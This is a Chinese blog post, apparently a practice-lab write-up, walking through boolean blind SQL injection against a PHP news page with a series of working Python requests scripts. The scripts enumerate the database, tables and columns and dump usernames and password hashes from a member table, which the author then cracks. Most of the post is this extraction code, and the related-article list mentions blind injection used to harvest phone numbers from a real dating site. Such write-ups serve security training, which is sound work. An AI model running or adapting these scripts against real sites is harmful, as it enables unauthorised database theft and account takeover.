SQL注入漏洞测试(布尔盲注)python

最新推荐文章于 2024-04-30 21:19:09 发布
最新推荐文章于 2024-04-30 21:19:09 发布
阅读量441 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: python sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45445398/article/details/129391211
版权

打开题目后,显然使用order by 判断列数 select 1,2,3,4 发现错误没有回显(有回显的参照我之前发的)这时候就开始爆破数据库了(我使用手动+py脚本,sqlmap更方便这里练习就使用py)在这里插入图片描述

在这里插入图片描述当判断数据库长度为1时页面错误看源码不断实验发现数据库名长度为10
在这里插入图片描述
当然也可以用python脚本直接跑出来,观察正确的页面里面有“关于平台停机…”

import requests
from bs4 import BeautifulSoup
url = 'http://124.70.71.251:40138/new_list.php?id=1 and length(database())='
for i in range(30):
    page = requests.get(url+str(i))
    page.encoding = "utf-8"
    html = page.text
    if "关于平台停机维护的通知" in html:
        print(i)
        break

代码运行输出10
之后开始爆破数据库名

// A code block
import requests
from bs4 import BeautifulSoup
url = 'http://124.70.71.251:48574/new_list.php?id=1'
for i in range(30):
    dd=" and length(database())="+str(i)
    page = requests.get(url+dd)
    page.encoding = "utf-8"
    html = page.text
    if "关于平台停机维护的通知" in html:
        print(i)
        break
print(i)
#数据库名
name = ''
for len in range(1,i+1):
    for a in range(1,128):
        dataname =" and ascii(substr(database(),"+str(len)+",1))="+str(a)
        p=requests.get(url+dataname)
        p.encoding = "utf-8"
        h=p.text
        if "关于平台停机维护的通知" in h:
            name=name+chr(a)
            break
print(name)

得到数据库名stormgroup,之后开始爆破表个数,表长和表名

#表的个数
import requests
from bs4 import BeautifulSoup
url = 'http://124.70.71.251:46296/new_list.php?id=1'

for i in range(1,30):
    tnumber =" and (select count(table_name) from information_schema.tables where table_schema=database())="+str(i)
    page=requests.get(url+tnumber)
    page.encoding = "utf-8"
    html=page.text
    if "关于平台停机维护的通知" in html:
        print(i)
        break

得到有两个表

#爆破表长
for l in range(0,2):
    for ll in range(5,30):
        ltable  = " and length((select table_name from information_schema.tables where table_schema=database() limit "+str(l)+",1))="+str(ll)
        p1 = requests.get(url+ltable)
        p1.encoding = "utf-8"
        h1 =p1.text
        if "关于平台停机维护的通知" in h1:
            print(ll)
            break

两个表长分别为6,6

import requests
from bs4 import BeautifulSoup
url = 'http://124.70.71.251:46296/new_list.php?id=1'
爆破表名
for l in range(0,2):
    tablename=''
    for m in range(1,7):
        for a in range(1,128):
            nn = " and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(l)+",1),"+str(m)+",1))="+ str(a)
            p=requests.get(url+nn)
            p.encoding = "utf-8"
            h=p.text
            if "关于平台停机维护的通知" in h:
                tablename=tablename+chr(a)
                break
    print(tablename)
    #得到表名member notice

之后就是爆破列长,列名这边就全写在一个代码中

import requests
from bs4 import BeautifulSoup
url = 'http://124.70.71.251:41349/new_list.php?id=1'

#判断列数
for l in range(1,30):
    clumn= " and (select count(column_name) from information_schema.columns where table_name = 'member')="+str(l)
    p=requests.get(url+clumn)
    p.encoding = "utf-8"
    h=p.text
    if "关于平台停机维护的通知" in h:
        print(l)
        break
for ll in range(0,l):
    cname=""
    for lll in range(1,30):
        qwe=" and length((select column_name from information_schema.columns where table_name='member' limit "+str(ll)+",1))="+str(lll)
        p1 = requests.get(url + qwe)
        p1.encoding = "utf-8"
        h1 = p1.text
        if "关于平台停机维护的通知" in h1:
            print(lll)
            break
    for llll in range(1,lll+1):
        for i in range(1,128):
            qqq=" and ascii(substr((select column_name from information_schema.columns where table_name='member' limit "+str(ll)+",1),"+str(llll)+",1))="+str(i)
            p2 = requests.get(url + qqq)
            p2.encoding = "utf-8"
            h2 = p2.text
            if "关于平台停机维护的通知" in h2:
                cname=cname+chr(i)
                break
    print(cname)

得到列名 name password status,后就是爆破里面的数据。
在这里插入图片描述

import requests
from bs4 import BeautifulSoup
url = 'http://124.70.71.251:41349/new_list.php?id=1'
for l in range(1,100):
    sdd=" and (select count(name) from member)="+str(l)
    p = requests.get(url + sdd)
    p.encoding = "utf-8"
    h = p.text
    if "关于平台停机维护的通知" in h:
        print(l)
        break
for ll in range(0,l):
    name=''
    for i in range(1,100):
        ff=" and length((select name from member limit "+str(ll)+",1))="+str(i)
        p = requests.get(url + ff)
        p.encoding = "utf-8"
        h = p.text
        if "关于平台停机维护的通知" in h:
            print(i)
            break
    for lll in range(1,i+1):
        for n in range(1,128):
            ee=" and ascii(substr((select name from member limit "+str(ll)+",1),"+str(lll)+",1))="+str(n)
            p = requests.get(url + ee)
            p.encoding = "utf-8"
            h = p.text
            if "关于平台停机维护的通知" in h:
                name=name+chr(n)
                break
    print(name)

输出得到mozhe mozhe,同样的将name换成password后得到
在这里插入图片描述
MD5解码得到账号密码

weixin_45445398
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2164
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
词达人小工具2
m0_61369360的博客
04-27 276
【代码】词达人小工具2。
sql盲注python脚本
weixin_48266255的博客
08-29 454
【代码】sql盲注python脚本
2024年Python最全Python自动化sql注入布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 431
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
SQL盲注python脚本自动化注入
菜鸟学安全的博客
12-18 1382
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
python mysql盲注脚本
夜班机器人的博客
07-26 2525
某相亲网漏洞,可盲注获得手机号和微信号。 功能1:爬取所有女性ID、年龄、月薪、照片URL 功能2:通过盲注方式获取对应ID的手机号和微信号 功能3:所有数据自动导入MYSQL 缺点:单线程
python 打造一个sql注入脚本 (一)
weixin_30577801的博客
03-18 1310
0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记。 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。 sql注入对渗透的作用: 获取数据 sql注入特性: 攻击方法由数据库类型决定 攻击结果由数据库决定 漏洞代码: sql.php <?php $id=$_GE...
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
自己动手编写SQL注入漏洞扫描器
12-24
### 自己动手编写SQL注入漏洞扫描器 #### 功能需求分析与实现思路 **功能需求:** 1. **支持单个/批量网站扫描** - 单个网站扫描功能是基本要求,它允许用户对特定目标进行深入检测。 - 批量网站扫描功能对于...
SQL住入原始脚本_SQL注入python脚本_
10-03
SQLmap是一个自动化工具,专门用于检测和利用SQL注入漏洞。它支持多种数据库类型,包括MySQL、PostgreSQL、Oracle等,并且可以执行各种类型的SQL注入攻击。在提供的压缩文件中,`less14_exp.py`, `less9_exp.py`, `...
手工盲注辅助注入工具Blind-SQL-Injector.zip
07-18
2. **智能推理**:根据响应时间和页面内容的变化,自动推断出SQL语句的真假结果,帮助用户识别潜在的SQL注入点。 3. **多种注入技术**:支持基于时间的和基于布尔的两种盲注方式,以及更复杂的注入策略。 4. **...
Struts2-057漏洞检测python脚本
11-04
Struts2-057检测python脚本,支持命令回显,计算和弹计算器
PHP的SQL注入实现(测试代码安全不错)
10-28
看黑客是如何入侵的,我们写编写php代码的过程中,最好自己先测试效果。
sql_injection_payloads.rar
05-30
- **SQLMap**:自动化的SQL注入工具,可快速发现和利用SQL注入漏洞。 - **OWASP ZAP**:开源Web应用安全项目,支持SQL注入测试。 4. **payload示例**: - `' OR '1'='1`:这个payload通常用于测试是否存在SQL...
mysql 盲注二分法python脚本
weixin_30384217的博客
04-29 1345
import urllib import urllib2 def doinject(payload): url = 'xxxxxxxxxxxxxxxxxxxxx' values = {'injection':payload,'inject':'Inject'} data = urllib.urlencode(values) #print d...
sql盲注之报错注入(附自动化脚本)
dfdhxb995397的博客
12-29 849
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Dupli...
基于时间盲注python脚本
weixin_43460822的博客
10-07 2279
思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称. #encoding=utf-8 #时间盲注脚本 import requests import time import datetime #获取数据库长度 def database_len(): #存放跑出的结果 length=0 ...
使用Python打造基本WEB漏洞扫描器(一) 网站爬虫+SQL注入检测
热门推荐
Wang Gangdan的博客
03-07 1万+
一、实验介绍 扫描器需要实现功能的思维导图: 1.1 实验内容 编写一个简单的多线程爬虫,用于对网站地址进行爬取,编写一个简单的sql注入工具,用于对网站地址进行sql注入的检测。 1.2 实验知识点 多线程的使用 网站爬虫的基本知识 SQL注入的基本原理 SQL检测工具编写,多参数URL的sql注入检测 正则表达式的基本知识 1.3 实验环境 Python 2.7 Win10 PyCha...
burpsuite sql注入漏洞测试(布尔盲注)
07-27
3. 构造注入语句:使用布尔盲注技术,构造适当的注入语句来测试漏洞。例如,您可以尝试通过在WHERE子句中使用布尔逻辑来判断条件是否为真或假来确定数据库中的信息。 4. 检测响应差异:发送经过注入处理的请求,并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值